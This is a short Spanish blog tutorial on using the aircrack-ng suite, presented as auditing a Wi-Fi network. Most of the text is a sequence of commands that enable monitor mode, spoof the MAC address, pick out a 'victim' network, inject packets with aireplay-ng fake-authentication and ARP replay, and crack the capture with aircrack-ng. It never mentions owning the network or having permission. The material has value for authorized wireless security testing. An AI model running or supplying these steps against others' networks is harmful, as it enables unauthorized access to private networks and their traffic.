Auditar una red wifi y capturar todos sus datos con aircrack

Actualizado el lunes, 4 septiembre, 2017

Aircrack- ng es un paquete completo de herramientas para evaluar la seguridad de la red Wi-Fi.

Se centra en varios ámbitos de la seguridad Wi-Fi:

  • Monitoreo: La captura de paquetes y exportación de datos en archivos de texto para su posterior procesamiento con herramientas de terceros.
  • Atacar: los ataques de repetición, desautentificación, puntos de acceso falsos y otros a través de la inyección de paquetes.
  • Pruebas: Comprobación de tarjetas WiFi y capacidades de los controladores (de captura y de inyección).
  • Cracking: WEP y WPA PSK (WPA 1 y 2).

Todas las herramientas que componen el paquete de aircrack trabajan en línea de comandos. Aunque existen muchas interfaces gráficas para el mismo y una excelente prueba de ello sería wifislax. Aunque su uso está orientado a Linux, también puede correr en Windows, OS X, FreeBSD, OpenBSD, NetBSD, incluso Solaris y eComStation 2.

 

 

Comenzamos:

Primero identificamos nuestra tarjeta de red, recuerda que si tu tarjeta no es compatible con el modo monitor, no funcionará, la tarjeta tiene que arrojar los valores: eth0 y mon0.

 

Activamos el modo monitor en nuestra tarjeta de red:

sudo airmon-ng start wlan0

Damos de baja mon0:
sudo ifconfig mon0 down

Cambiaremos la dirección MAC de mon0 por »00:11:22:33:44:55«:
sudo macchanger -m 00:11:22:33:44:55 mon0

Damos de alta mon0:
sudo ifconfig mon0 up

Escaneamos las redes, hasta localizar una víctima:
sudo airodump-ng mon0

 

Detenemos el escaneo con Ctrl -c.

 

Ejecutamos airodump-ng, cambiamos los datos entre corchetes por los de nuestra víctima:

sudo airodump-ng -c [# canal] -w [nombre red] --bssid [dirección MAC] mon0

En los pasos siguientes deberemos abrir nuevas terminales o consolas, es importante que no cierres las que ya tienes abiertas.

Abrimos otra terminal cambiando los datos entre corchetes por los de la víctima:

sudo aireplay-ng -1 6000 -a [direccion MAC victima] -h 00:11:22:33:44:55 mon0

Abrimos otra terminal:
aireplay-ng -3 -b [dirección MAC victima ] -h 00:11:22:33:44:55 mon0

Abrimos otra terminal:
aireplay-ng -1 0 -e (Nomb red) -a (mac victima) -h 00:11:22:33:44:55 mon0

Abrimos la última terminal:
aircrack-ng (nombre de la red)-01.cap

Y con todo esto ya tenemos nuestro archivo *.cap (captura). Podemos investigar en el.

Más artículos sobre Aircrack: https://www.sololinux.es/testar-password-wifi-aircrack-ng/

Web del proyecto: Aircrack

 

 

Agregar comentario